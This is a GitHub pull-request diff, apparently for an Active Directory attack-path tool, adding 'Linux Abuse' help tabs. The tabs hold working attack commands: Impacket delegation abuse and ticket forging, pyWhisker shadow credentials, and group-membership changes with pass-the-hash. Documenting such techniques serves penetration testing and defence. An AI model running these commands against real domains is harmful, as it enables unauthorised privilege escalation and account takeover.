Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adding abuse guidance from UNIX-like hosts #625

Merged
merged 32 commits into from
Apr 27, 2023
Merged

Adding abuse guidance from UNIX-like hosts #625

Show file tree
Hide file tree
Changes from 28 commits
Commits
Show all changes
32 commits
Select commit Hold shift + click to select a range
f4b5bec
AddAllowedToAct Linux abuse
ShutdownRepo Dec 19, 2022
b88e29c
Adding references for AddAllowedToAct
ShutdownRepo Dec 19, 2022
8f15843
AddKeyCredentialLink Linux abuse
ShutdownRepo Dec 19, 2022
f99e4c0
AddMember Linux abuse
ShutdownRepo Dec 19, 2022
b056853
Fixing missing space with links
ShutdownRepo Dec 19, 2022
b73c2b3
AddSelf Linux abuse
ShutdownRepo Dec 19, 2022
a45e6d7
Adding other UNIX-like tools to AdminTo
ShutdownRepo Dec 19, 2022
6ea097b
AllExtendedRights Linux abuse
ShutdownRepo Dec 19, 2022
8c6b1e5
AllowedToAct Linux abuse
ShutdownRepo Dec 19, 2022
920c0e0
AllowedToDelegate Linux abuse
ShutdownRepo Dec 19, 2022
aac965b
DCSync Linux abuse
ShutdownRepo Dec 19, 2022
b7f2d70
ForceChangePassword Linux abuse
ShutdownRepo Dec 19, 2022
810603e
GenericAll Linux abuse
ShutdownRepo Dec 19, 2022
23b090d
Adding headers for AllExtendedRights linux abuse
ShutdownRepo Dec 19, 2022
34327bc
GenericWrite Linux abuse
ShutdownRepo Dec 19, 2022
91e2186
Fixing indentation
ShutdownRepo Dec 19, 2022
59c534c
GetChanges Linux abuse
ShutdownRepo Dec 19, 2022
361b4eb
GetChangesAll Linux abuse
ShutdownRepo Dec 19, 2022
21dd4b9
Forgot a few references
ShutdownRepo Dec 19, 2022
df384f3
Redundant case
ShutdownRepo Dec 19, 2022
208d42c
Owns Linux abuse
ShutdownRepo Dec 19, 2022
17f2773
Missing Owns refs
ShutdownRepo Dec 19, 2022
d3d67a8
ReadGMSAPassword Linux abuse
ShutdownRepo Dec 19, 2022
7ca242c
ReadLAPSPassword Linux abuse
ShutdownRepo Dec 19, 2022
a79a711
WriteAccountRestrictions Linux abuse
ShutdownRepo Dec 19, 2022
ec3eb5e
WriteDacl Linux abuse
ShutdownRepo Dec 19, 2022
0023864
WriteOwner Linux abuse
ShutdownRepo Dec 19, 2022
867990f
WriteSPN Linux abuse
ShutdownRepo Dec 19, 2022
e4e9a18
Removing addcomputer.py step for AllowedToAct
ShutdownRepo Jan 20, 2023
1714f2e
Fixed missing extension for secretsdump on DCSync, Getchanges, GetCha…
ShutdownRepo Jan 20, 2023
4c6d44a
Adding missing rbcd.py step for GenericAll, GenericWrite, Owns, Write…
ShutdownRepo Jan 20, 2023
38abfea
Replacing LAPSDumper with pyLAPS
ShutdownRepo Jan 20, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -21,13 +22,16 @@ const AddAllowedToAct = ({
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
Expand Down
42 changes: 42 additions & 0 deletions src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
import React from 'react';

const LinuxAbuse = () => {
return (
<>
First, if an attacker does not control an account with an
SPN set, a new attacker-controlled computer account can be
added with Impacket's addcomputer.py example script:
<pre>
<code>
{
"addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
}
</code>
</pre>
We now need to configure the target object so that the attacker-controlled
computer can delegate to it. Impacket's rbcd.py script can be used for that
purpose:
<pre>
<code>
{
"rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
}
</code>
</pre>
And finally we can get a service ticket for the service name (sname) we
want to "pretend" to be "admin" for. Impacket's getST.py example script
can be used for that purpose.
<pre>
<code>
{
"getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
}
</code>
</pre>
This ticket can then be used with Pass-the-Ticket, and could grant access
to the file system of the TARGETCOMPUTER.
</>
);
};

export default LinuxAbuse;
8 changes: 8 additions & 0 deletions src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,14 @@ const References = () => {
<a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
https://github.com/Kevin-Robertson/Powermad#new-machineaccount
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
</a>
</>
);
};
Expand Down
4 changes: 2 additions & 2 deletions ...odals/HelpTexts/AddAllowedToAct/Abuse.jsx → ...elpTexts/AddAllowedToAct/WindowsAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
import React from 'react';

const Abuse = () => {
const WindowsAbuse = () => {
return (
<>
Abusing this primitive is currently only possible through the Rubeus
Expand Down Expand Up @@ -62,4 +62,4 @@ const Abuse = () => {
);
};

export default Abuse;
export default WindowsAbuse;
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
Expand Down
25 changes: 25 additions & 0 deletions src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
import React from 'react';
import PropTypes from 'prop-types';

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>

<pre>
<code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
</pre>

<p>
For other optional parameters, view the pyWhisker documentation.
</p>
</>
);
};

LinuxAbuse.propTypes = {
sourceName: PropTypes.string,
sourceType: PropTypes.string,
};

export default LinuxAbuse;
8 changes: 4 additions & 4 deletions .../HelpTexts/AddKeyCredentialLink/Abuse.jsx → ...xts/AddKeyCredentialLink/WindowsAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
import React from 'react';
import PropTypes from 'prop-types';

const Abuse = ({ sourceName, sourceType }) => {
const WindowsAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>To abuse this privilege, use Whisker. </p>
Expand All @@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {
</pre>

<p>
For other optional parameters, view the Whisper documentation.
For other optional parameters, view the Whisker documentation.
</p>
</>
);
};

Abuse.propTypes = {
WindowsAbuse.propTypes = {
sourceName: PropTypes.string,
sourceType: PropTypes.string,
};

export default Abuse;
export default WindowsAbuse;
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddMember/AddMember.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => {
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
Expand Down
53 changes: 53 additions & 0 deletions src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
import React from 'react';
import PropTypes from "prop-types";

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
or prompted interactively if omitted from the command line:
</p>

<pre>
<code>
{
'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>

<p>
Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
</p>

<pre>
<code>
{
'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
}
</code>
</pre>

<p>
Finally, verify that the user was successfully added to the group:
</p>

<pre>
<code>
{
'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>
</>
);
};

LinuxAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default LinuxAbuse;
4 changes: 4 additions & 0 deletions src/components/Modals/HelpTexts/AddMember/References.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,10 @@ const References = () => {
<a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
</a>
<br />
<a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
https://www.thehacker.recipes/ad/movement/dacl/addmember
</a>
</>
);
};
Expand Down
6 changes: 3 additions & 3 deletions ...ents/Modals/HelpTexts/AddMember/Abuse.jsx → ...dals/HelpTexts/AddMember/WindowsAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
import React from 'react';
import PropTypes from "prop-types";

const Abuse = ({ sourceName, sourceType }) => {
const WindowsAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Expand Down Expand Up @@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
);
};

Abuse.propTypes= {
WindowsAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default Abuse;
export default WindowsAbuse;
14 changes: 9 additions & 5 deletions src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,8 @@ import React from 'react';
import PropTypes from 'prop-types';
import { Tabs, Tab } from 'react-bootstrap';
import General from './General';
import Abuse from './Abuse';
import WindowsAbuse from './WindowsAbuse';
import LinuxAbuse from './LinuxAbuse';
import Opsec from './Opsec';
import References from './References';

Expand All @@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
targetName={targetName}
/>
</Tab>
<Tab eventKey={2} title='Abuse Info'>
<Abuse sourceName={sourceName} sourceType={sourceType} />
<Tab eventKey={2} title='Windows Abuse'>
<WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={3} title='Opsec Considerations'>
<Tab eventKey={3} title='Linux Abuse'>
<LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
</Tab>
<Tab eventKey={4} title='Opsec'>
<Opsec />
</Tab>
<Tab eventKey={4} title='References'>
<Tab eventKey={5} title='Refs'>
<References />
</Tab>
</Tabs>
Expand Down
53 changes: 53 additions & 0 deletions src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
import React from 'react';
import PropTypes from "prop-types";

const LinuxAbuse = ({ sourceName, sourceType }) => {
return (
<>
<p>
Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
or prompted interactively if omitted from the command line:
</p>

<pre>
<code>
{
'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>

<p>
Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
</p>

<pre>
<code>
{
'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
}
</code>
</pre>

<p>
Finally, verify that the user was successfully added to the group:
</p>

<pre>
<code>
{
'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
}
</code>
</pre>
</>
);
};

LinuxAbuse.propTypes= {
sourceName: PropTypes.string,
sourceType: PropTypes.string
}

export default LinuxAbuse;
Loading